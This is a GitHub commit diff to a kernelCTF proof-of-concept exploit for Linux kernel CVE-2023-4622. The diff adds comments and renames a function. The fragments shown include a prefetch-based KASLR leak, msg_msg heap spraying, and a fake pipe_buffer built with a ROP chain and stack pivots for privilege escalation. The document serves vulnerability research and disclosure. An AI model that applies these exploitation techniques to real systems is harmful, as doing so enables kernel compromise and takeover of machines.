Skip to content

Commit dddf30b

Browse files
author
Bing-Jhong Billy Jheng
committed
Add more comments on poc.c for read
1 parent 25c9d28 commit dddf30b

File tree

4 files changed

+9
-8
lines changed

4 files changed

+9
-8
lines changed

pocs/linux/kernelctf/CVE-2023-4622_lts/exploit/lts-6.1.36/exploit

3.69 KB
Binary file not shown.

pocs/linux/kernelctf/CVE-2023-4622_lts/exploit/lts-6.1.36/poc

29.7 KB
Binary file not shown.

pocs/linux/kernelctf/CVE-2023-4622_lts/exploit/lts-6.1.36/poc.c

+9-8
Original file line numberDiff line numberDiff line change
@@ -185,8 +185,8 @@ size_t mostFrequent(size_t *arr, size_t n)
185185

186186
return element_having_max_freq;
187187
}
188-
189-
// EntryBleed: Breaking KASLR under KPTI with Prefetch (CVE-2022-4543)
188+
// Since there no KPTI on the remote server (as its CPU is not affected by Meltdown, so the kernel does not turn on KPTI)
189+
// so this is actually prefetch attack. ref: https://gruss.cc/files/prefetch.pdf
190190
void leak()
191191
{
192192
size_t kbase[0x8] = {0};
@@ -224,6 +224,7 @@ int setup_msg()
224224
printf("setup msg start..\n");
225225
memset(&msg.mtext[0], 0, 0x2000);
226226
msg.mtype = 1;
227+
// Removes all of the current user's previously allocated msg_msg structs to aviod reach limits.
227228
system("ipcrm --all=msg");
228229
for (int i = 0; i < NUM_QUEUE; i++)
229230
{
@@ -284,19 +285,19 @@ int setup_msg()
284285

285286
char user_buf[] = "|/proc/%P/fd/666";
286287
#define ROP(idx) ((size_t *)rop)[(idx) + (START_ROP / 8)]
287-
int build_rop(size_t rop_addr, char *rop)
288+
int build_fake_pipe_buffer_with_rop_chain(size_t rop_addr, char *rop)
288289
{
289290
*(size_t *)&rop[0x8] = POP_RDI;
290291
*(size_t *)&rop[0x18] = POP_RSP;
291292
*(size_t *)&rop[0x20] = rop_addr + START_ROP;
292293

293294
#ifdef LTS
294-
*(size_t*)&rop[0x10] = rop_addr+0x30;
295-
*(size_t*)&rop[0x38] = PIVOT3;
295+
*(size_t*)&rop[0x10] = rop_addr+0x30; //set pipe_buffer.ops
296+
*(size_t*)&rop[0x38] = PIVOT3; //set pipe_buf_operations.release
296297
*(size_t*)&rop[0x2e] = PIVOT2;
297298
#else
298-
*(size_t *)&rop[0x10] = rop_addr + 0x20;
299-
*(size_t *)&rop[0x28] = PIVOT3;
299+
*(size_t *)&rop[0x10] = rop_addr + 0x20; //set pipe_buffer.ops
300+
*(size_t *)&rop[0x28] = PIVOT3; //set pipe_buf_operations.release
300301
*(size_t *)&rop[0x39] = PIVOT2;
301302
#endif
302303

@@ -462,7 +463,7 @@ int corrupted_msg()
462463

463464
// prepare fake pipe_buffer and rop payload
464465
msg.mtype = 6;
465-
build_rop(known_addr_pipe, &msg.mtext[0x1000 - 0x30 - 8]);
466+
build_fake_pipe_buffer_with_rop_chain(known_addr_pipe, &msg.mtext[0x1000 - 0x30 - 8]);
466467
for (int j = 0; j < NUM_QUEUE_RESV; j++)
467468
{
468469
// overwrite pipe_buffer

pocs/linux/kernelctf/CVE-2023-4622_lts/exploit/lts-6.1.36/poc.tar.gz

3.69 KB
Binary file not shown.

0 commit comments

Comments
 (0)